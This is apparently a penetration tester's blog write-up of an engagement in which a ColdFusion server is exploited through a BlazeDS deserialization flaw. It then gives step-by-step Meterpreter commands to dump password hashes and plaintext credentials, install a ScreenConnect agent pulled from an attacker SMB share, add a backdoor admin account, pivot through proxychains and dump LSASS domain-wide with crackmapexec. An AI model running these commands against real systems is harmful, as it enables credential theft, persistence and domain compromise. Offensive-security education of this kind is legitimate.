During an external engagement recently, I encountered a ColdFusion server was vulnerable to the BlazeDS Vulnerability which allows remote code execution. I stumbled upon the article written by Brett DeWall at WhiteOak, which has a great write up of this vulnerability and how to exploit it which can be found here https://www.whiteoaksecurity.com/2019-9-3-blazeds-java-object-deserialization-exploit-walkthrough/. I followed this write up and was able to successfully exploit this vulnerability using the ExploitDB exploit in combination with ysoserial. I used a Metasploit web delivery payload instead of Empire because I’m more familiar with pivoting in Metasploit, which, with this being found on a public facing server, was inevitable 🙂.
The scenario for this job was an external facing server with a vulnerable version of ColdFusion and the only exposed ports were 80 and 443. This means that pivoting and lateral movement would have to be done by tunneling all traffic through this host. The details are below. Enjoy!
Meterpreter Credential Gathering
When creating the web delivery payload on a public facing IP, make sure that the SRVHOST IP is your routable IP address and the LPORT IP address is your internal IP address. My environment was an EC2 Kali Linux instance with security zone rules that were essentially any/any to the target host I was exploiting. This made messing around with listeners/ports easier and not requiring me to mess with the security groups every time I was switching something, and when the job is done I can just remove that one rule and be done with it.
Once payload executes and the Meterpreter shell successfully connects back, the next goal is to grab some credentials off the machine. Having credentials, especially from a server (where the credentials are likely to be that off an administrator or someone in IT) will help expedite the goal of becoming a domain administrator. These credentials will also be used during the pivoting for lateral movement. Note that the local administrative hash of the user is equally as lethal as a domain account, so take note of that with a samdump as it could serve you well when we get to the passing the hash portion of this write up. Grabbing credentials can be done using the following
/** Dumping the SAM the traditional way **/ run hashdump /** Dumping the SAM a fancy way **/ load powershell powershell_import /root/powershel/Invoke-PowerDump.ps1 // fancy way of dumping SAM hashes /** Grabbing Plaintext Passwords **/ load kiwi creds_wdigest
RDP with(out) RDP
I’m not afraid to admit it, I love having an RDP session, especially when I’m running the gauntlet on a machine. It makes life easier for me. Because RDP Port 3389 was not visible from the outside world, I had a couple options.
- Create a portfwd with metasploit to gain RDP Access. This is the “traditional” way to do it when you’re trying to access service behind a firewall
- Weaponize ScreenConnect! This has many benefits over RDP such as file transfer, automatically connecting back, and routing all connections through normal web traffic.
I chose option 2 from the above because, well why not. These are the steps I performed to get this running.
- Created a SC agent from my console and downloaded the .exe.
- Using smbserver.py, I created a share on my local kali box where I could pull the sc.exe file and install the agent. The command for this was
Usage: python3 /path/to/smbserver.py <sharename> </path/to/folder/with/file/> Actual Usage: python3 /root/Desktop/smbserver.py -smb2support sharethis /root/Downloads/
- On my meterpreter session, I dropped into a shell and ran a copy command to grab this from my SMB server
Usage: copy \\<your IP>\<sharename>\<nameofscagent> Actual Usage: copy \\mypubip\sharethis\sc.exe
- Once this downloaded, run the agent by typing “sc.exe” in the terminal and the agent would auto-install and provide you with a screenconnect session in your cloud dashboard 🙂
- Create a new local admin account so that you can log into the machine with SC
net user newadmin NewAdminPass123 /add net localgroup administrators newadmin /add
Once this is done, you can log into the machine with SC!
*Note that the sc.exe payload could have also been easily transferred using the metasploit upload command, but knowing the above usage is much more valuable especially if you’re using Empire.
Pivoting using metasploit and meterpreter is actually very simple. I first run an autoroute command to create the routes that allow me to enumerate other hosts on the targeted internal network. I recommend running an “ipconfig” on the Windows machine to see the interfaces and IP addresses. In my case, the IP addressing scheme was a 10.10.x.x
run autoroute -s 10.10.0.0/16
Autoroute is great, however, only metasploit traffic will be routed using it. If you want other tools in Kali to be routed, you’ll need to set up a proxychain. This is also very simple.
use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > set version 4a msf6 auxiliary(server/socks_proxy) > run
This will start a proxy on the defined LPORT (default is 1080) that will communicate with the autoroute that was just created. To pass the Kali tools through this proxy, you’ll have to edit the proxychains4.conf file.
nano /etc/proxychains4.conf **SCROLL ALL THE WAY TO THE BOTTOM OF THIS FILE AND CHANGE THE LAST LINE TO CORRESPODN WITH YOUR PROXY SERVER IP AND PORT** [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks4 **127.0.0.1 1080**
Once this is done, you can use the proxychains command to run just about any tool in kali through that proxy server.
I used crackmapexec to compromise the entire domain right through proxychains. This is the exact same usage as if you were doing a normal internal penetration test.
proxychains crackmapexec smb targets.txt -u jsmith -p HisPassword2021 -M lsassy
LSASSY will dump the lsass from the machines, giving you usable NT hashes as well as plaintext credentials. These credentials are also saved to the cmedb database, so you can view them with a simple creds command while in there.
With a little bit of luck, you should be pulling down some domain administrative credentials shortly!